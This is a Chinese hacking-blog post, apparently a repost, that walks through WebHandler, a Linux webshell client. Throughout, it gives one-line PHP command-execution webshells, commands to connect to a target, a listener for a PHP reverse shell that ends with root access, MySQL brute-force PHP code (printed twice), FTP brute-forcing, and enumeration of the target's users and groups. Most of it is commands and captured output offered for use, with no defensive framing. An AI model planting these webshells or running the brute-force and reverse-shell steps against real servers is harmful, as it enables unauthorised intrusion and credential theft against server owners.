记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Linux版的”中国菜刀”––WEBhandler

2013-01-08 01:10

安装:

root@ashker:/pen/door# wget http://dis9-server.googlecode.com/files/webhandler.zip

root@ashker:/pen/door# unzip webhandler.zip

root@ashker:/pen/door# cd webhandler

root@ashker:/pen/door/webhandler# apt-get install python-setuptools

root@ashker:/pen/door/webhandler# easy_install argparse

客服端使用
GET提交:
root@ashker:/var/www# echo '<?php system($_GET['cmd']); ?>' > /var/www/get.php
链接
root@ashker:/pen/door/webhandler# python2.7 webhandler.py --url http://5.5.5.3/get.php?cmd=
________         __     _______                 __ __
|  |  |  |.—–.|  |–.|   |   |.—.-.—–.–|  |  |.—–.—-.
|  |  |  ||  -__||  _  ||       ||  _  |     |  _  |  ||  -__|   _|
|________||_____||_____||___|___||___._|__|__|_____|__||_____|__|
————————————————————————-
 [!] “non-git”. Keep up-to-date by running ‘–update’
———————————————————–
User         : www-data
ID           : uid=33(www-data) gid=33(www-data) groups=33(www-data)
Kernel       : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
CWD          : /var/www drwxrwxrwx
Uptime       : 4 minutes
Target’s IPs : 5.5.5.3
Our IP       :110.110.10.1
———————————————
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
1www-data@5.5.5.3:~(/var/www):$ id
2uid=33(www-data) gid=33(www-data) groups=33(www-data)
3www-data@5.5.5.3:~(/var/www):$
POST提交:
root@ubuntu:/var/www# echo '<?php echo exec($_POST['cmd']); ?>' > post.php
连接
1root@ashker:/pen/door/webhandler# python2.7 webhandler.py --url http://5.5.5.3/post.php --method POST --parameter cmd
__          __  _     _    _                 _ _
       / / | |   | |  | |               | | |
 /  / /__| |__ | |__| | __ _ _ __   __| | | ___ _ __
  /  / / _ ‘_ |  __  |/ _` | ‘_ / _` | |/ _ ‘__|
   /  /  __/ |_) | |  | | (_| | | | | (_| | |  __/ |
   /  / ___|_.__/|_|  |_|__,_|_| |_|__,_|_|___|_|
———————————————————–
 [!] “non-git”. Keep up-to-date by running ‘–update’
———————–
User         : 5.5.5.3
ID           : Unknown
Kernel       : Unknown
CWD          : Unknown Unknown
Uptime       : Unknown
Target’s IPs : Unknow
Our IP       : 110.110.10.1
———————–
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
15.5.5.3@Unknow:~(Unknown):$ id
2uid=33(www-data) gid=33(www-data) groups=33(www-data)
35.5.5.3@Unknow:~(Unknown):$
监听功能
先监听端口
1root@ashker:/pen/door/webhandler# python2.7 webhandler.py --listen 1234
[!] “non-git”. Keep up-to-date by running ‘–update’
[i] Waiting on port: 1234
运行PHP REVER SHELL 获得SHELL
获得系统信息:
# root@5.5.5.3:~(/var/www):$ @info
———————————————————-
User         : root
ID           : uid=0(root) gid=0(root) groups=0(root)
Kernel       : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
CWD          : /var/www drwxrwxrwx
Uptime       : 11 minutes
Target’s IPs : 5.5.5.3
Our IP       : 110.110.10.1
——————————————————–
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
1root@5.5.5.3:~(/var/www):$
暴力破解MYSQL:
默认字典: modules/bruters/wordlist.txt,他会自动上传
这个东西有点占用进程.而且还是单线程 小心使用
核心代码
01#!/usr/bin/env php
02<?php
03error_reporting(0);
04$host = "127.0.0.1";
05$user_dict = "wordlist.txt";
06$pass_dict = "wordlist.txt";
07$userFile = file($user_dict);
08$passFile = file($pass_dict);
09$success;
10foreach ($userFile as $user) {
11    if ($success == 1) {
12        break;
13    }
14    foreach ($passFile as $pass) {
15        $user = trim($user);
16        $pass = trim($pass);
17        $connection = mysql_connect($host, $user, $pass);
18        if ($connection) {
19            echo "success:" . $user . ":" . $pass . "n";
20            $success = 1;
21            mysql_close($connection);
22            break;
23        }
24    }
25}
26?>
27#!/usr/bin/env php
28<?php
29error_reporting(0);
30$host = "127.0.0.1";
31$user_dict = "wordlist.txt";
32$pass_dict = "wordlist.txt";
33$userFile = file($user_dict);
34$passFile = file($pass_dict);
35$success;
36foreach ($userFile as $user) {
37    if ($success == 1) {
38        break;
39    }
40    foreach ($passFile as $pass) {
41        $user = trim($user);
42        $pass = trim($pass);
43        $connection = mysql_connect($host, $user, $pass);
44        if ($connection) {
45            echo "success:" . $user . ":" . $pass . "n";
46            $success = 1;
47            mysql_close($connection);
48            break;
49        }
50    }
51}
52?>
暴力FTP
一样
view source
5.5.5.3@Unknow:~(Unknown):$ @brute  ftp
查看用户组
5.5.5.3@Unknow:~(Unknown):$ @enum group
[+] Total number of groups: 1
——————————————————-
Group Name      | Password    | Group ID | Group List |
——————————————————-
honeyd          | *In shadow* | 115      |            |
——————————————————-
5.5.5.3@Unknow:~(Unknown):$ @enum passwd
[+] Total number of users: 1
———————————-
Username          | Password    | User ID | Group ID | User Info                           | Home Directory               | Shell
—————————————————————-
b                 | *In shadow* | 1004    | 33       |                                     | /dev/null                    | /usr/sbin/nologin
————————————————————–
5.5.5.3@Unknow:~(Unknown):$
知识来源: www.ashker.net/index.php/archives/598

阅读:494263 | 评论:1 | 标签:Linux Shell

想收藏或者和大家分享这篇好文章→复制链接地址

“Linux版的”中国菜刀”––WEBhandler”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云